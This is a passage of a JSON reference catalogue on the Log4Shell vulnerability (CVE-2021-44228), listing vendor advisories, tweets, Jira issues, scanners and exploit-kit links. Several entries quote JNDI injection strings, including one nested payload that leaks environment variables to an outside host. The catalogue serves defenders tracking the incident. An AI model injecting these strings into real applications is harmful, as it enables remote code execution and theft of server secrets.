"type": "ADVISORY",
"url": "https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability"
},
{
"name": "NELSON",
"type": "ADVISORY",
"url": "https://github.com/getnelson/nelson/blob/f4d3dd1f1d4f8dfef02487f67aefb9c60ab48bf5/project/custom.scala"
},
{
"name": "NetApp",
"type": "ADVISORY",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "Netflix",
"type": "ADVISORY",
"url": "https://github.com/search?q=org%3ANetflix+CVE-2021-44228\u0026type=commits"
},
{
"name": "NextGen Healthcare Mirth",
"type": "ADVISORY",
"url": "https://github.com/nextgenhealthcare/connect/discussions/4892#discussioncomment-1789526"
},
{
"name": "Newrelic",
"type": "ADVISORY",
"url": "https://github.com/newrelic/newrelic-java-agent/issues/605"
},
{
"name": "Okta",
"type": "ADVISORY",
"url": "https://sec.okta.com/articles/2021/12/log4shell"
},
{
"name": "OpenHab",
"type": "ADVISORY",
"url": "https://github.com/openhab/openhab-distro/pull/1343"
},
{
"name": "OpenNMS",
"type": "ADVISORY",
"url": "https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/"
},
{
"name": "OpenSearch",
"type": "ADVISORY",
"url": "https://discuss.opendistrocommunity.dev/t/log4j-patch-for-cve-2021-44228/7950"
},
{
"name": "Oracle",
"type": "ADVISORY",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "Palo-Alto Networks",
"type": "ADVISORY",
"url": "https://security.paloaltonetworks.com/CVE-2021-44228"
},
{
"name": "PaperCut",
"type": "ADVISORY",
"url": "https://www.papercut.com/support/known-issues/#PO-684"
},
{
"name": "Positive Technologies",
"type": "ADVISORY",
"url": "https://twitter.com/ptsecurity/status/1469398376978522116"
},
{
"name": "Pulse Secure",
"type": "ADVISORY",
"url": "https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44933/?kA13Z000000L3dR"
},
{
"name": "Puppet",
"type": "ADVISORY",
"url": "https://puppet.com/blog/puppet-response-to-remote-code-execution-vulnerability-cve-2021-44228/"
},
{
"name": "Pure Storage",
"type": "ADVISORY",
"url": "https://support.purestorage.com/Field_Bulletins/Interim_Security_Advisory_Regarding_CVE-2021-44228_(%22log4j%22)"
},
{
"name": "Qlik",
"type": "ADVISORY",
"url": "https://community.qlik.com/t5/Support-Updates-Blog/Vulnerability-Testing-Apache-Log4j-reference-CVE-2021-44228-also/ba-p/1869368"
},
{
"name": "RedHat",
"type": "ADVISORY",
"url": "https://access.redhat.com/security/cve/cve-2021-44228"
},
{
"name": "RunDeck by PagerDuty",
"type": "ADVISORY",
"url": "https://docs.rundeck.com/docs/history/CVEs/"
},
{
"name": "RSA",
"type": "ADVISORY",
"url": "https://community.rsa.com/t5/general-security-advisories-and/rsa-customer-advisory-apache-vulnerability-log4j2-cve-2021-44228/ta-p/660501"
},
{
"name": "Rubrik",
"type": "ADVISORY",
"url": "https://support.rubrik.com/s/announcementdetail?Id=a406f000001PwOcAAK"
},
{
"name": "SailPoint",
"type": "ADVISORY",
"url": "https://community.sailpoint.com/t5/IdentityIQ-Blog/IdentityIQ-log4j-Remote-Code-Execution-Vulnerability/ba-p/206681"
},
{
"name": "Salesforce",
"type": "ADVISORY",
"url": "https://help.salesforce.com/s/articleView?id=000363736\u0026type=1"
},
{
"name": "Security Onion",
"type": "ADVISORY",
"url": "https://blog.securityonion.net/2021/12/security-onion-2390-20211210-hotfix-now.html"
},
{
"name": "ServiceNow",
"type": "ADVISORY",
"url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB1000959"
},
{
"name": "Sesam Info",
"type": "ADVISORY",
"url": "https://twitter.com/sesam_info/status/1469711992122486791"
},
{
"name": "Shibboleth",
"type": "ADVISORY",
"url": "http://shibboleth.net/pipermail/announce/2021-December/000253.html"
},
{
"name": "SLF4J",
"type": "ADVISORY",
"url": "http://slf4j.org/log4shell.html"
},
{
"name": "SmileCDR",
"type": "ADVISORY",
"url": "https://www.smilecdr.com/our-blog/a-statement-on-log4shell-cve-2021-44228"
},
{
"name": "Sophos",
"type": "ADVISORY",
"url": "https://www.sophos.com/en-us/security-advisories/sophos-sa-20211210-log4j-rce"
},
{
"name": "SonarSource",
"type": "ADVISORY",
"url": "https://community.sonarsource.com/t/sonarqube-and-the-log4j-vulnerability/54721"
},
{
"name": "SonicWall",
"type": "ADVISORY",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "Spring Boot",
"type": "ADVISORY",
"url": "https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot"
},
{
"name": "SUSE",
"type": "ADVISORY",
"url": "https://www.suse.com/security/cve/CVE-2021-44228.html"
},
{
"name": "Sterling Order IBM",
"type": "ADVISORY",
"url": "https://www.ibm.com/support/pages/node/6525544"
},
{
"name": "Swingset",
"type": "ADVISORY",
"url": "https://github.com/bpangburn/swingset/blob/017452b2d0d8370871f43a68043dacf53af7f759/swingset/CHANGELOG.txt#L10"
},
{
"name": "Talend",
"type": "ADVISORY",
"url": "https://jira.talendforge.org/browse/TCOMP-2054"
},
{
"name": "Tanium",
"type": "ADVISORY",
"url": "https://community.tanium.com/s/article/How-Tanium-Can-Help-with-CVE-2021-44228-Log4Shell"
},
{
"name": "TrendMicro",
"type": "ADVISORY",
"url": "https://success.trendmicro.com/solution/000289940"
},
{
"name": "Ubiquiti-UniFi-UI",
"type": "ADVISORY",
"url": "https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1"
},
{
"name": "Vespa ENGINE",
"type": "ADVISORY",
"url": "https://github.com/vespa-engine/blog/blob/f281ce4399ed3e97b4fed32fcc36f9ba4b17b1e2/_posts/2021-12-10-log4j-vulnerability.md"
},
{
"name": "VMware",
"type": "ADVISORY",
"url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html"
},
{
"name": "Wallarm",
"type": "ADVISORY",
"url": "https://lab.wallarm.com/cve-2021-44228-mitigation-update/"
},
{
"name": "Wowza",
"type": "ADVISORY",
"url": "https://www.wowza.com/docs/known-issues-with-wowza-streaming-engine#log4j2-cve"
},
{
"name": "Yandex-Cloud",
"type": "ADVISORY",
"url": "https://github.com/yandex-cloud/docs/blob/6ff6c676787756e7dd6101c53b051e4cd04b3e85/ru/overview/security-bulletins/index.md#10122021--cve-2021-44228--%D1%83%D0%B4%D0%B0%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5-%D0%B2%D1%8B%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BA%D0%BE%D0%B4%D0%B0-log4shell-apache-log4j"
},
{
"name": "ZAMMAD",
"type": "ADVISORY",
"url": "https://community.zammad.org/t/cve-2021-44228-elasticsearch-users-be-aware/8256"
},
{
"name": "Zaproxy",
"type": "ADVISORY",
"url": "https://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/"
},
{
"name": "ZSCALER",
"type": "ADVISORY",
"url": "https://www.zscaler.fr/blogs/security-research/security-advisory-log4j-0-day-remote-code-execution-vulnerability-cve-2021"
},
{
"name": "Canadian Centre for Cyber Security - Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action",
"type": "EVIDENCE",
"url": "https://cyber.gc.ca/en/news/statement-minister-national-defence-apache-vulnerability"
},
{
"name": "https://twitter.com/CyberRaiju/status/1469505677580124160",
"type": "EVIDENCE",
"url": "https://twitter.com/CyberRaiju/status/1469505677580124160"
},
{
"name": "https://twitter.com/0gtweet/status/1469661769547362305",
"type": "EVIDENCE",
"url": "https://twitter.com/0gtweet/status/1469661769547362305"
},
{
"name": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/",
"type": "FIX",
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation",
"type": "EVIDENCE",
"url": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/"
},
{
"name": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/",
"type": "FIX",
"url": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/"
},
{
"name": "https://twitter.com/yazicivo/status/1469349956880408583",
"type": "EVIDENCE",
"url": "https://twitter.com/yazicivo/status/1469349956880408583"
},
{
"name": "log4j: between a rock and a hard places",
"type": "EVIDENCE",
"url": "https://crawshaw.io/blog/log4j"
},
{
"name": "Log4j: Between a rock and a hard place - comments",
"type": "EVIDENCE",
"url": "https://news.ycombinator.com/item?id=29523608"
},
{
"content": "Dumped my Log4J Yara rules here: https://github.com/timb-machine/log4j/. Rather than look for vulnerable code, the primary idea was to identify projects that are pulling Log4J in.",
"name": "https://twitter.com/timb_machine/status/1470091290289352704",
"timestamp": "2021-12-12T18:00",
"type": "EVIDENCE",
"url": "https://twitter.com/timb_machine/status/1470091290289352704"
},
{
"name": "Yara rules for log4j",
"type": "EVIDENCE",
"url": "https://github.com/timb-machine/log4j/"
},
{
"content": "#log4j\n${jndi:ldap://xxxxx.dnslog.cn/exp}",
"name": "https://hypixel.net/threads/psa-there-is-a-fatal-remote-code-execution-exploit-in-minecraft-and-its-by-typing-in-chat.4703238/",
"tags": [
"timeline"
],
"timestamp": "2021-12-09T05:49TZ??",
"type": "EVIDENCE",
"url": "https://hypixel.net/threads/psa-there-is-a-fatal-remote-code-execution-exploit-in-minecraft-and-its-by-typing-in-chat.4703238/"
},
{
"name": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/",
"type": "EVIDENCE",
"url": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/"
},
{
"content": "#log4j\n${jndi:ldap://xxxxx.dnslog.cn/exp}",
"name": "https://twitter.com/sirifu4k1/status/1468951859381485573",
"tags": [
"timeline",
"#log4j",
"first_tweet"
],
"timestamp": "2021-12-09T14:33",
"type": "EVIDENCE",
"url": "https://twitter.com/sirifu4k1/status/1468951859381485573"
},
{
"content": "#log4j \u96be\u4ee5\u60f3\u8c61\uff0c\u8fd9\u6837\u4e00\u4e2a RCE \u6f0f\u6d1e\u5728\u534a\u4e2a\u591a\u6708\u524d\u88ab\u53d1\u73b0\uff0c5\u5929\u524d\u88ab\u4fee\u590d\uff0c\u7ed3\u679c\u5230\u4eca\u5929\u8fde CVE \u90fd\u6ca1\u6709\uff0c\u8fde\u65b0\u7684\u6b63\u5f0f Release \u90fd\u6ca1\u53d1\u3002",
"name": "https://twitter.com/CattusGlavo/status/1469010118163374089",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T18:24",
"type": "EVIDENCE",
"url": "https://twitter.com/CattusGlavo/status/1469010118163374089"
},
{
"content": "\ud83d\udd25 Patch log4j NOW ! \ud83d\udd25 CVE-2021-44228 \ud83d\udd25 Path: log4j-2.15.0-rc1 and log4j-2.15.0-rc2 Set log4j2.formatMsgNoLookups to true. #log4j #apache #RCE #Log4Shell",
"name": "https://twitter.com/domineefh/status/1469237240341704705",
"tags": [
"timeline",
"#log4shell"
],
"timestamp": "2021-12-10T09:27",
"type": "EVIDENCE",
"url": "https://twitter.com/domineefh/status/1469237240341704705"
},
{
"content": "RCE 0-day exploit found in log4j, a popular Java logging package https://lunasec.io/docs/blog/log4j-zero-day/",
"name": "https://twitter.com/_r_netsec/status/1469120458083962882",
"tags": [
"timeline"
],
"timestamp": "2021-12-10T01:43",
"type": "EVIDENCE",
"url": "https://twitter.com/_r_netsec/status/1469120458083962882"
},
{
"content": "#log4j Using -Dlog4j2.formatMsgNoLookups=true to disable message pattern lookup can solve this problem, but if you rely on it, please update your log4j2 as soon as possible.",
"name": "https://twitter.com/CattusGlavo/status/14690131867413012499",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T18:36",
"type": "FIX",
"url": "https://twitter.com/CattusGlavo/status/1469013186741301249"
},
{
"content": "Worst Log4j RCE Zeroday Dropped on Internet https://cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html #apache #log4j #bugbounty #security #SecurityBreach #cybersecurity",
"name": "https://twitter.com/cyberkendra/status/1469028640511836163",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T19:38",
"type": "EVIDENCE",
"url": "https://twitter.com/cyberkendra/status/1469028640511836163"
},
{
"content": "#log4j ${jndi:ldap:// \u8fd9\u6f0f\u6d1e\u6709\u70b9\u6050\u6016\uff0c\u8fd8\u5728\u7528\u65e7\u7248JDK\u7684\u8981\u6ce8\u610f\u4e86y",
"name": "https://twitter.com/h113sdx/status/1469010902183661568",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T18:27",
"type": "EVIDENCE",
"url": "https://twitter.com/h113sdx/status/1469010902183661568"
},
{
"content": "We wrote up a summary on the log4j 0-day that was found earlier today. This is going to be fun for a lot of people scrambling to patch this tonight!",
"name": "https://twitter.com/freeqaz/status/1469121757361569793",
"tags": [
"timeline"
],
"timestamp": "2021-12-10T01:48",
"type": "EVIDENCE",
"url": "https://twitter.com/freeqaz/status/1469121757361569793"
},
{
"content": "Earliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.",
"name": "https://twitter.com/eastdakota/status/1469800951351427073",
"tags": [
"timeline"
],
"timestamp": "2021-12-11T10:47",
"type": "EVIDENCE",
"url": "https://twitter.com/eastdakota/status/1469800951351427073"
},
{
"content": "@GreyNoise is currently seeing 2 unique IP\u0027s scanning the internet for the new Apache Log4j RCE vulnerability (No CVE assigned yet). A tag to track this activity on http://greynoise.io will be made available shortly and linked as a reply when released.",
"name": "https://twitter.com/_mattata/status/1469144854672379905",
"tags": [
"timeline"
],
"timestamp": "2021-12-09",
"type": "EVIDENCE",
"url": "https://twitter.com/_mattata/status/1469144854672379905"
},
{
"name": "Restrict LDAP access via JNDI #608",
"tags": [
"timeline"
],
"timestamp": "2021-11-30",
"type": "EVIDENCE",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"content": "Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it. Those who are will need to specify -Dlog4j2.enableJndi=true or the environment variable form of it to use any JNDI components.",
"name": "LOG4J2-3208 Disable JNDI by default",
"tags": [
"timeline"
],
"timestamp": "2021-12-11",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3208"
},
{
"content": "LDAP needs to be limited in the servers and classes it can access. JNDI should only support the java, ldap, and ldaps protocols by default.",
"name": "LOG4J2-3201 Limit the protocols jNDI can use and restrict LDAP.",
"tags": [
"timeline"
],
"timestamp": "2021-12-05",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"content": "As opposed to setting \"%m {nolookups}\" in all pattern definitions, I would like to globally disable the feature",
"name": "LOG4J2-2109 Add property to disable message pattern converter lookups",
"tags": [
"timeline"
],
"timestamp": "2017-11-09T13:25",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-2109"
},
{
"content": "In page \"Configuration\", section \"Property Substitution\", it would be nice to add \"jndi\" context in the table listing all possible contexts. Because natively, log4j2 supports property substitution using jndi variables. It\u0027s too bad to not mention it into documentation.",
"name": "LOG4J2-1133 In page \"Configuration\", section \"Property Substitution\", add \"jndi\" context",
"tags": [
"timeline"
],
"timestamp": "2015-09-15T16:58",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-1133"
},
{
"content": "Currently, Lookup plugins [1] don\u0027t support JNDI resources. It would be really convenient to support JNDI resource lookup in the configuration. One use case with JNDI lookup plugin is as follows: I\u0027d like to use RoutingAppender [2] to put all the logs from the same web application context in a log file (a log file per web application context). And, I want to use JNDI resources look up to determine the target route (similarly to JNDI context selector of logback [3]). Determining the target route by JNDI lookup can be advantageous because we don\u0027t have to add any code to set properties for the thread context and JNDI lookup should always work even in a separate thread without copying thread context variables.",
"name": "LOG4J2-313 JNDI Lookup plugin support",
"tags": [
"timeline"
],
"timestamp": "2013-07-17",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-313"
},
{
"name": "Log4Shell scanner for Burp Suite",
"type": "EVIDENCE",
"url": "https://github.com/silentsignal/burp-log4shell"
},
{
"name": "https://blog.silentsignal.eu/2021/12/12/our-new-tool-for-enumerating-hidden-log4shell-affected-hosts/",
"type": "EVIDENCE",
"url": "https://blog.silentsignal.eu/2021/12/12/our-new-tool-for-enumerating-hidden-log4shell-affected-hosts/"
},
{
"name": "https://twitter.com/_StaticFlow_/status/1469358229767475205",
"timestamp": "2021-12-10T18:27",
"type": "EVIDENCE",
"url": "In case anyone hasn\u0027t discovered this. The Log4J formatting is nestable which means payloads like \"${jndi:ldap://${env:user}.xyz.collab.com/a}\" Will leak server side env vars!"
},
{
"name": "Panorama 10.1 OSS Listing",
"type": "ADVISORY",
"url": "https://docs.paloaltonetworks.com/oss-listings/panorama-oss-listings/panorama-10-1-open-source-software-oss-listing.html"
},
{
"name": "UniFi Network Application 6.5.54",
"type": "ADVISORY",
"url": "https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1"
},
{
"name": "https://twitter.com/tnpitsecurity/status/1469429810216771589",
"timestamp": "2021-12-10T11:12",
"type": "ADVISORY",
"url": "e can confirm that VMWare vCenter is affected by the Log4j vulnerability. #log4j #vcenter #Log4Shell"
},
{
"name": "https://github.com/xiajun325/apache-log4j-rce-poc",
"type": "EVIDENCE",
"url": "https://github.com/xiajun325/apache-log4j-rce-poc"
},
{
"name": "https://www.reddit.com/r/crowdstrike/comments/rda0ls/20211210_cool_query_friday_hunting_apache_log4j/",
"type": "EVIDENCE",
"url": "https://www.reddit.com/r/crowdstrike/comments/rda0ls/20211210_cool_query_friday_hunting_apache_log4j/"
},
{
"name": "https://github.com/PortSwigger/active-scan-plus-plus/commit/b485a0744140533d877ce244603502b42f9c6656",
"type": "EVIDENCE",
"url": "https://github.com/PortSwigger/active-scan-plus-plus/commit/b485a0744140533d877ce244603502b42f9c6656"
},
{
"content": "You can run these queries on @sourcegraph to determine the scope of impact of the log4j 0-day on your code:",
"name": "https://twitter.com/beyang/status/1469171471784329219",
"type": "EVIDENCE",
"url": "https://twitter.com/beyang/status/1469171471784329219"
},
{
"name": "https://semgrep.dev/r?q=log4j-message-lookup-injection",
"type": "EVIDENCE",
"url": "https://semgrep.dev/r?q=log4j-message-lookup-injection"
},
{
"name": "https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j",
"type": "EVIDENCE",
"url": "https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j"
},
{
"name": "https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/",
"type": "EVIDENCE",
"url": "https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/"
},
{
"name": "https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/",
"type": "EVIDENCE",
"url": "https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/"
},
{
"name": "CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228"
},
{
"name": "CISA - Apache Log4j Vulnerability Guidance",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance"
},
{
"name": "CISA Log4j (CVE-2021-44228) Vulnerability Guidance",
"type": "EVIDENCE",
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"name": "The FTC Wants Companies to Find Log4j Fast. It Won\u0027t Be Easy",
"type": "ARTICLE",
"url": "https://www.wired.com/story/lo4j-ftc-vulnerability/"
},
{
"name": "CISA director: We\u0027ll be dealing with Log4j for a long time",
"type": "ARTICLE",
"url": "https://www.cnet.com/tech/services-and-software/cisa-director-well-be-dealing-with-log4j-for-a-long-time/#ftag=CAD590a51e"
},
{
"content": "Subject: Entrust Cloud Services response to Log4J Vulnerability\n Message Group: Security Vulnerabilities\nMessage Expiry Date: 1/31/22\nOn December 10, 2021, details emerged about a critical remote code execution vulnerability in Apache Log4j, assigned as CVE-2021-44228, in which users who can cause specifically crafted strings to be processed by an application\u0027s Log4j logging layer may be able to execute code and thereby take control of the server hosting the affected application. The official security advisory from Apache can be found here: https://logging.apache.org/log4j/2.x/security.html\n\n Entrust has investigated the impact of CVE-2021-44228 in all of our hosted services. Entrust is continuing to monitor and asses ongoing product impacts and will perform additional actions as necessary. Product-specific details known at the time of writing are below.\n\n Impact of Vulnerability:\n\n Entrust Certificate Services:\n Entrust Certificate Services has sufficiently strong network controls to prevent direct exploitation. Additionally, Entrust has performed mitigations consistent with the Apache Log4j advisory. Note that the on-premise Discovery Agent component is affected, and is covered in Entrust Security Bulletin E21-008. Discovery Agent is out of support and superseded by Entrust Discovery Scanner, which is not affected.\n\n PKI as a Service (PKIaaS):\n Entrust has performed mitigations on PKI as a Service (PKIaaS) consistent with the Apache Log4j advisory, and additionally is applying product patches to update Log4j to version 2.15 or later. \n\n Remote Signing Service:\n Remote Signing Service has sufficiently strong network controls and has incoming data validation that prevent direct exploitation. Entrust is applying product patches to update Log4j to version 2.15 or later. \n\n Signing Automation Service:\n Entrust has performed mitigations for Signing Automation Service consistent with the Apache Log4j advisory, and additionally will apply product patches to update Log4j to version 2.15 as the patches become available.\n\n Ongoing Mitigating Efforts:\n Entrust is monitoring our hosted services for exploit attempts related to this vulnerability, and will take additional action as necessary. For all environments listed above, Entrust has initiated a review and mitigation process with its vendors supplying 3rd party products used in these environments, and will take actions as necessary.\n\n Corrective Action:\n No customer action is required at this time. Further information will be communicated in product-specific bulletins as necessary.",
"name": "donotreply@entrust.com - Certificate Services Message Center - Entrust Cloud Services response to Log4J Vulnerability",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": ""
},
{
"content": "Malware being delivered by #log4j base64 encoded two payloads serving ELF 32-bit LSB executable, Intel 80386 sha256sum a4b278170b0cb798ec930938b5bd45bbf12370a1ccb31a2bee6b2c406d881df6 contains many layer 4 and layer 7 attack functions",
"name": "https://twitter.com/_larry0/status/1470362325463015428",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": "https://twitter.com/_larry0/status/1470362325463015428"
},
{
"content": "Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP!",
"name": "https://twitter.com/marcioalm/status/1470361495405875200",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": "https://twitter.com/marcioalm/status/1470361495405875200"
},
{
"name": "https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/",
"type": "EVIDENCE",
"url": "https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/"
},
{
"name": "ABC News - New cyber vulnerability poses \u0027severe risk,\u0027 DHS says",
"type": "EVIDENCE",
"url": "https://abcnews.go.com/US/cyber-vulnerability-poses-severe-risk-dhs/story?id=81713422"
},
{
"content": "This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-44228).",
"name": "Log4j Vulnerability (CVE-2021-44228)",
"type": "EVIDENCE",
"url": "https://github.com/NCSC-NL/log4shell"
},
{
"name": "Technologies using Apache Log4j",
"type": "EVIDENCE",
"url": "https://gist.github.com/noperator/d360de81c061bc9c628b12d3f0e1e479"
},
{
"name": "Comments on the CVE-2021-44228 vulnerability",
"type": "EVIDENCE",
"url": "http://slf4j.org/log4shell.html"
},
{
"name": "https://www.ncsc.nl/actueel/advisory?id=NCSC-2021-1052",
"type": "EVIDENCE",
"url": "https://www.ncsc.nl/actueel/advisory?id=NCSC-2021-1052"
},
{
"content": "Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.",
"name": "nse-log4shell",
"type": "EVIDENCE",
"url": "https://github.com/Diverto/nse-log4shell"
},
{
"content": "log4shell.tools is a tool allows you to run a test to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228.",
"name": "log4shell.tools",
"type": "EVIDENCE",
"url": "https://github.com/alexbakker/log4shell-tools"
},
{
"content": "fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts",
"name": "log4j-scan",
"type": "EVIDENCE",
"url": "https://github.com/fullhunt/log4j-scan"
},
{
"content": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading",
"name": "log4j-detect",
"type": "EVIDENCE",
"url": "https://github.com/takito1812/log4j-detect"
},
{
"name": "Log4Shell: Reconnaissance and post exploitation network detection",
"type": "EVIDENCE",
"url": "https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/"
},
{
"name": "https://musana.net/2021/12/13/log4shell-Quick-Guide/",
"type": "EVIDENCE",
"url": "https://musana.net/2021/12/13/log4shell-Quick-Guide/"
},
{
"name": "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/"
},
{
"content": "",
"name": "https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/",
"timestamp": "",
"type": "EVIDENCE",
"url": "https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/"
},
{
"content": "This is a forked modified version of the great exploitation tool created by @welk1n (https://github.com/welk1n/JNDI-Injection-Exploit). Here is what I\u0027ve updated on his tool:\n\n Added support to serialized java payloads to LDAP payloads. This allows exploitation of any java version as long the classes are present in the application classpath ignoring completely the trustURLCodebase=false.",
"name": "JNDI-Exploit-Kit",
"type": "EVIDENCE",
"url": "https://github.com/pimps/JNDI-Exploit-Kit"
},
{
"content": "JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.",
"name": "JNDI-Injection-Exploit",
"type": "EVIDENCE",
"url": "https://github.com/welk1n/JNDI-Injection-Exploit"
},
{
"name": "Google Cloud recommendations for investigating and responding to the Apache \u201cLog4j 2\u201d vulnerability (CVE-2021-44228)",
"type": "EVIDENCE",
"url": "https://cloud.google.com/blog/products/identity-security/recommendations-for-apache-log4j2-vulnerability"
},
{
"name": "Google Cloud IDS signature updates to help detect CVE-2021-44228 Apache Log4j vulnerability",
"type": "EVIDENCE",
"url": "https://cloud.google.com/blog/products/identity-security/cloud-ids-to-help-detect-cve-2021-44228-apache-log4j-vulnerability"
},
{
"name": "Log4Shell Hell: anatomy of an exploit outbreak",
"type": "EVIDENCE",
"url": "https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/"
},
{
"name": "https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/",
"type": "EVIDENCE",
"url": "https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/"
},
{
"name": "Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited",
"type": "EVIDENCE",
"url": "https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html"
},
{
"name": "Inside the Log4j2 vulnerability (CVE-2021-44228)",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/"
},
{
"name": "http://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html",
"type": "EVIDENCE",
"url": "http://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html"
},
{
"name": "https://research.kudelskisecurity.com/2021/12/10/log4shell-critical-severity-apache-log4j-remote-code-execution-being-actively-exploited-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://research.kudelskisecurity.com/2021/12/10/log4shell-critical-severity-apache-log4j-remote-code-execution-being-actively-exploited-cve-2021-44228/"
},
{
"name": "Remote code injection in Log4j",
"type": "EVIDENCE",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"name": "PSA: Log4Shell and the current state of JNDI injection",
"type": "EVIDENCE",
"url": "https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/"
},
{
"name": "Widespread Exploitation of Critical Remote Code Execution in Apache Log4j",
"type": "EVIDENCE",
"url": "https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/"
},
{
"name": "https://isc.sans.edu/diary/rss/28120",
"type": "EVIDENCE",
"url": "https://isc.sans.edu/diary/rss/28120"
},
{
"name": "https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228",
"type": "EVIDENCE",
"url": "https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228"
},
{
